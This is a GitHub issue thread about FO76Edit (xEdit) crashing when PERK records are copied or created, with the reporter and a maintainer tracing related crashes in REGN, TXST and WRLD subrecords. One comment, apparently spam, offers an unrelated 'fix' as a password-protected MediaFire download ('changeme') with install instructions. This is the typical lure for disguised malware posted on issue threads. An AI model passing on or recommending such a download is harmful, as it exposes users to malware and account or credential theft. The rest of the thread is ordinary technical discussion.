### ISSUE TITLE
PERK CTDs

### ISSUE THREAD

**Issue by Kuroitsune** [TES5Edit/TES5Edit#1375]
Program:
FO76Edit 4.1.5f x64 and FO76Edit 4.1.5f x32

Issue:
Copying or adding a PERK will cause xEdit to CTD.

Reproduce:
Simply try to copy a PERK from SeventySix.esm or NW.esm into a new file (or even into NW.esm). xEdit will CTD. Or, try to add a new, empty PERK into a new file (or even in NW.esm). x Edit will CTD.

What xEdit should do:
FO76 should copy the PERK into another file or create an empty PERK form.

Additional Data:
I copied a PERK from Fallout 4 that was present with the same FormID in Fallout 76. FO76Edit loads the PERK just fine, but there is some extra data in the Fallout 4 PERK as to be expected of course. Copying the data from SeventySix.esm into the dummy file subrecord by subrecord as a test works as expected, unless you drag over the entire record at once then xEdit will CTD.

Adding file for the hell of it, just in case. Simply a Fallout 4 perk I used to test this issue. (Change to .esp.)
[test.txt](https://github.com/user-attachments/files/16830821/test.txt)

**Comment by robertgk2017** [comment]
Can you update to 4.1.5j, reproduce and post your exception logs?

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by eckserah** [comment]
FO76 doesn't support making mods at all with esms because it can get you banned.

**Comment by nerwus3456** [comment]
does FO76 even have the necessary code to load non hardcoded esms?

**Comment by eckserah** [comment]
Yup, but you won't be able to get in game with it and run the risk of getting banned.

**Comment by Kuroitsune** [comment]
I have updated to 4.1.5j and the bug persists but oddly xEdit does not generate an exception log, at least not one I can find (main folder, data folder, appdata, my docs, etc.). It simply CTD with no explanation. I'm sorry I don't have anything more for you. I got the data I wanted from the PERK form, figured I'd bring this up since xEdit has been pretty solid in regards to 76.

**Comment by robertgk2017** [comment]
We're looking into it, I think we have found where the issue is.

**Comment by Kuroitsune** [comment]
Does it happen to be in the DATA subrecord? If I write a script to force delete the subrecord (normally can't delete it as xEdit prevents that) and try to copy data into it or add a new DATA subrecord, it CTD. It doesn't do that for any other subrecord and doing it to other Forms with similar restrictions (AMMO, WEAP, etc.) xEdit doesn't crash. I was just screwing around and happen to isolate the issue. I think.

**Comment by robertgk2017** [comment]
Not specifically, its a problem in a function that grabs the data size of a sub-record for condition checks, more of a general thing.

**Comment by Kuroitsune** [comment]
Ah, gotcha. Thanks for the heads up and looking into it. I know it's semi-pointless since you can't add plugins (officially anyway) to 76 but figured in case that becomes a thing in the future, nip it in the bud now.

**Comment by Kuroitsune** [comment]
Sorry to add to this but I have found another form with the same issue. In the Region (REGN) form, copying a form with RDOT Region Data Object, (Region Data Entries\Region Data Entry\RDOT) or adding the RDOT subrecord to a Region form will cause xEdit to crash out. Same as with the original PERK finding, no log is produced. I figure the cause is the same - which you guys have located - just thought to point it out.

**Comment by robertgk2017** [comment]
good to point it out.  Will dounle check this out.

**Comment by Kuroitsune** [comment]
You'll hate me for this but I found another issue like this just now but without the crashing. In Texture Sets (TXST), if you copy the form into another file, the DODT - Decal Data subrecord fails to copy. It will add the element with all of the sub elements correctly, but not copy the data over. Dragging the element from one file to another has the same effect, it'll add the element but not copy the data. However, you can drag each sub element's value individually. Not a critical bug, just an odd one.

**Comment by Kuroitsune** [comment]
Actually, this happens with any form with a DODT - Decal Data.

**Comment by Kuroitsune** [comment]
Sorry, but I found something else. In the WRLD form under VISI - Visible Cells\Cells, if you try to add another element to the Row array xEdit crashes. Some thing as last time, no log, nothing. I assume same issue as the other two, and already taken care of, but figured I should point it out. Anyway, this subrecord isn't used and hidden under Ignored, so it's not that important.

**Comment by robertgk2017** [comment]
You can't add new elements to VISI, that is a fixed size array, same for CLSZ and OFST.   The Array lengths for all 3 of these is derived from the worldspace bounds.  All 3 of them have special functions that calculate and set their length.

**Comment by Kuroitsune** [comment]
Ah, thanks for the explanation. Makes sense it crashes now but I feel like xEdit should tell me, 'no, bugger off' instead of dying.

I appreciate the information. Hoping this is the last of the issues I find while messing about.

**Comment by robertgk2017** [comment]
I don't think it should be crashing, that seems odd, but generally those Offset sub-records can't be adjusted as they have to be a certain size relative to what Worldspace they are on.

**Comment by Kuroitsune** [comment]
Might be because I have Simple Records option turned off at the moment.
